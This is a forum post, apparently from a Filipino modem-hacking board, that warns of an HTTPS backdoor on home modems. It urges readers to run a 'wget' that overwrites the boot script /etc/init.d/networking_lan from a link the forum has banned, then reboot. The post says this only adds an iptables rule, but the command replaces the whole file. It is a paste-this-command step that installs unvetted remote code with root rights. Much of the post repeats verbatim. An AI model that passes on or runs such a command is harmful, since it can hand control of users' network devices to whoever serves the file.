I wanted to make a separate thread to remind everyone to protect their modems! So far the methods of protection posted only do things like hide/mask the mac or change passwords. This cannot protect you against the new backdoor I revealed yesterday in this thread: http://www.symbianize.com/showthread.php?t=1162514
Even if you disable httpsd from the ACL menu it's still enabled! This means you can be easily remoted even if you use the basic protection methods I mentioned before. But I have a solution for this, make sure you are connected to the internet, then connect on telnet or ssh and run these two commands:
wget http://*** BANNED LINK - DO NOT POST ***/raw.php?i=T3qSMCab -O /etc/init.d/networking_lan
reboot
When you are done it should look like this:
If you ran these two commands successfully your modem will reboot and the protection will be enabled, nothing else needs to be done!
Running these commands adds one line to this init.d script on your modem, this line:
iptables -A INPUT -p tcp --dport 443 -j REJECT
This rejects incoming connections on port 443, keeping your modem safe from remoters. You still need to make sure everything else (80, 22, 23) is disabled. Good luck!
Even if you disable httpsd from the ACL menu it's still enabled! This means you can be easily remoted even if you use the basic protection methods I mentioned before. But I have a solution for this, make sure you are connected to the internet, then connect on telnet or ssh and run these two commands:
wget http://*** BANNED LINK - DO NOT POST ***/raw.php?i=T3qSMCab -O /etc/init.d/networking_lan
reboot
When you are done it should look like this:
If you ran these two commands successfully your modem will reboot and the protection will be enabled, nothing else needs to be done!
Running these commands adds one line to this init.d script on your modem, this line:
iptables -A INPUT -p tcp --dport 443 -j REJECT
This rejects incoming connections on port 443, keeping your modem safe from remoters. You still need to make sure everything else (80, 22, 23) is disabled. Good luck!
Last edited: